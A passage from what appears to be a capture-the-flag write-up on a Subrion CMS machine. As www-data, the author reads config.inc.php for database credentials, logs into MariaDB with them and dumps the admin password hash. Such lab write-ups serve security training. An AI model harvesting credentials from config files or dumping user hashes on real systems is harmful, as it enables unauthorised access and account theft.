MySQL
Checking for DB credential after performing a manual system enumeration
www-data@exfiltrated:/var/www/html/subrion$ cat /var/www/html/subrion/includes/config.inc.php
<?php
/*
* Subrion Open Source CMS 4.2.1
* Config file generated on 10 June 2021 12:04:54
*/
define('INTELLI_CONNECT', 'mysqli');
define('INTELLI_DBHOST', 'localhost');
define('INTELLI_DBUSER', 'subrionuser');
define('INTELLI_DBPASS', 'target100');
define('INTELLI_DBNAME', 'subrion');
define('INTELLI_DBPORT', '3306');
define('INTELLI_DBPREFIX', 'sbr421_');
define('IA_SALT', '#5A7C224B51');
// debug mode: 0 - disabled, 1 - enabled
define('INTELLI_DEBUG', 0);DB credential identified; subrionuser:target100
www-data@exfiltrated:/var/www/html/subrion$ mysql -usubrionuser -ptarget100
mysql -usubrionuser -ptarget100
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 177736
Server version: 10.3.29-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> use subrion;
use subrion;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [subrion]> Session established
MariaDB [subrion]> selselect username,password from sbr421_members;
select username,password from sbr421_members;
+----------+--------------------------------------------------------------+
| username | password |
+----------+--------------------------------------------------------------+
| admin | $2y$10$yLtIS38vqzWRmZPY3RxqsetMJRRi6VzaiKdCU53R/bpa4AHhXyZ6G |
+----------+--------------------------------------------------------------+
1 row in set (0.000 sec)Password is admin
N/A